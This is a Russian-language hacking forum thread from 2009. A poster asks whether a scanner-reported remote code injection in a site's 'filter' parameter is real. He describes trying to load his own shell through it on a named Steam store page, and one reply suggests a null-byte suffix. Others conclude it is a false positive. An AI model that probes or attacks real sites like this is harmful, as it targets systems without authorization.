Выполнение кода с удаленного сервера

Discussion in 'Уязвимости' started by diznt, 5 Jan 2009.

  1. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    И так я создаю новую тему и не судите меня да не судимы будете (так как мне наврятли ответят в теме специальной) :D лан начнем...
    И так насканил (xspider прогой) я тут сайт там обнаружилась серьезная уязвимость с описанием таким вот

    " Возможно выполнение атаки "Code Injection". Это может позволить атакующему выполнить произвольный код на вашей системе, взятый с удаленного сервера.

    Запрос для выполнения атаки:

    http://sait.com/news/?filter=http://wwwwwwww/ "

    что еще за код инжект? я сначало подумал(прочитав описание) что нужно указывать путь до шелла вместо "http://wwwwwww/" но указав путь до моего шелла (хост не поддерживает php) шелл был как и в .txt формате как и .php (просто я уже не помню в каком формате надо указывать) у меня ничего не вышло..... Есть какие идеи? Или это не может быть вообще уязв?
     
    #1 diznt, 5 Jan 2009
    Last edited: 5 Jan 2009
    3 people like this.
  2. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    да я так тоже думаю
    там аж нету ошибки на сайте если ставить всякие слеши в том случае
    но все таки интересует!
     
    1 person likes this.
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Не факт, что ошибка появится.
    А скорее всего XSpider просто ошибся.
     
    5 people like this.
  4. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    Пробуй тот же запрос с "ядовитым нулём" на конце: %00
     
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    diehard да не это спайдер ошибся так как он ща почему то не выдает такую ошибку при скане (вроде как) не помогает все равно
     
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Ссылку в студию, и посмотрим.
     
  7. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    http://store.steampowered.com/news/?filter=http://wwwwwwww/&appids=440

    произошло все тут а точнее выдал такую вот сылку в спайдере
     
  8. preda1or

    preda1or Member

    Joined:
    27 Oct 2008
    Messages:
    167
    Likes Received:
    96
    Reputations:
    6
    нет там инклуда...
     
    1 person likes this.